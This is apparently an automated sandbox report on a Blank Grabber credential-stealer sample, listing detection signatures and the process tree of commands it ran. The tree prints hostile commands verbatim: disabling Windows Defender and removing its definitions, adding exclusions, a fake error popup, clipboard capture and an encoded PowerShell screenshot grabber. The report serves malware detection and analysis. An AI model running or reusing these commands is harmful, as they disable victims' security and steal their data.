Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Resource.exe

Overview

General Information

Sample name:Resource.exe
Analysis ID:1584846
MD5:cd56d1639c638ef44a1cbcf6756ef2ba
SHA1:784970f33b026fe770d8c0f8938d17b26c428327
SHA256:79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88
Tags:BlankGrabberexeuser-aachum
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Resource.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\Resource.exe" MD5: CD56D1639C638EF44A1CBCF6756EF2BA)
    • Resource.exe (PID: 6048 cmdline: "C:\Users\user\Desktop\Resource.exe" MD5: CD56D1639C638EF44A1CBCF6756EF2BA)
      • cmd.exe (PID: 2360 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7232 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3936 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7288 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 5972 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 6512 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7308 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7300 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7192 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7368 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7636 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7712 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7788 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7888 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8004 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\Resource.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8092 cmdline: attrib +h +s "C:\Users\user\Desktop\Resource.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8128 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8036 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7196 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7836 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7740 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5772 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7732 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7180 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7772 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5820 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7736 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 3720 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7752 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7452 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8092 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 2352 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8056 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
